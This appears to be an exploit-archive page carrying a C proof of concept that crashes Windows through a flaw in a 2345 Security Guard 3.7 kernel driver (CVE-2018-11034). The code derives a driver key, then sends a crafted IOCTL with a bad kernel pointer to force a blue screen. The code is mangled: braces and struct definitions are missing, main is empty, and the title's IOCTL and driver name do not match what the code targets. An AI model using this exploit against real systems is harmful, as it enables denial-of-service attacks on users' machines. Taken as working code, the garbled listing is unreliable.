2345 security guard 3.7 2345nsprotect.sys denial of service Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-05-14 |
Type : dos |
Platform : windows
This exploit / vulnerability 2345 security guard 3.7 2345nsprotect.sys denial of service is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: [BSOD by IOCTL 0x8000200D in 2345NsProtect.sys of 2345 Security Guard 3.7]
# Date: [20180513]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7] (REQUIRED)
# Tested on: [Windows X64]
# CVE : [CVE-2018- 11034]
#include <windows.h>
#include <stdio.h>
DWORD pid;
char seed[0x14];//
BYTE set_state;//
BYTE unk;//1
WORD buf_len;//2
DWORD pid;//4
char buf[0x64];//8
struct NETFW_IOCTL_222040
DWORD* ptr;
DWORD size;
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
int result;
*a1 ^= *a2;
*a2 ^= *a1;
result = (unsigned __int8)*a2;
*a1 ^= result;
return result;
int __stdcall sub_12A80(char *a1, int len, char *a3)
int result;
unsigned __int8 v4;
__int16 i;
__int16 j;
unsigned __int8 k;
for ( i = 0; i < 256; ++i )
a3[i] = i;
a3[256] = 0;
a3[257] = 0;
k = 0;
v4 = 0;
result = 0;
for ( j = 0; j < 256; ++j )
v4 += a3[j] + a1[k];
f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
result = (k + 1) / len;
k = (k + 1) % len;
return result;
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
char *result;
__int16 i;
unsigned __int8 v5;
unsigned __int8 v6;
v5 = a3[256];
v6 = a3[257];
for ( i = 0; i < len; ++i )
v6 += a3[++v5];
f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
a3[256] = v5;
result = a3;
a3[257] = v6;
return result;
void calc_seed(char* seed, char* dst)
char Source1[26] = {0};
char a3[300] = {0};
Source1[0] = 8;
Source1[1] = 14;
Source1[2] = 8;
Source1[3] = 10;
Source1[4] = 2;
Source1[5] = 3;
Source1[6] = 29;
Source1[7] = 23;
Source1[8] = 13;
Source1[9] = 3;
Source1[10] = 15;
Source1[11] = 22;
Source1[12] = 15;
Source1[13] = 7;
Source1[14] = 91;
Source1[15] = 4;
Source1[16] = 18;
Source1[17] = 26;
Source1[18] = 26;
Source1[19] = 3;
Source1[20] = 4;
Source1[21] = 1;
Source1[22] = 15;
Source1[23] = 25;
Source1[24] = 10;
Source1[25] = 13;
sub_12A80(seed, 0x14, a3);
sub_12B60(Source1, 0x1A, a3);
memcpy(dst, Source1, 26);
int poc_2345NetFirewall()
HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
printf("[-] Open device error: %d\n", GetLastError());
return 1;
DWORD BytesReturned = 0;
DWORD ctlcode = 0x222298;
NETFW_IOCTL_ADD_PID add_pid = {0};
add_pid.pid = GetCurrentProcessId();
if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
ctlcode = 0x2222A4;
NETFW_IOCTL_SET_PID set_pid = {0};
set_pid.pid = GetCurrentProcessId();
set_pid.set_state = 1;
calc_seed(add_pid.seed, set_pid.buf);
set_pid.buf_len = 26;
if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
ctlcode = 0x222040;
NETFW_IOCTL_222040 buf_222040 = {0};
buf_222040.size = 1;
buf_222040.ptr = (DWORD*)0x80000000;
if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
return 0;
int main()
return 0;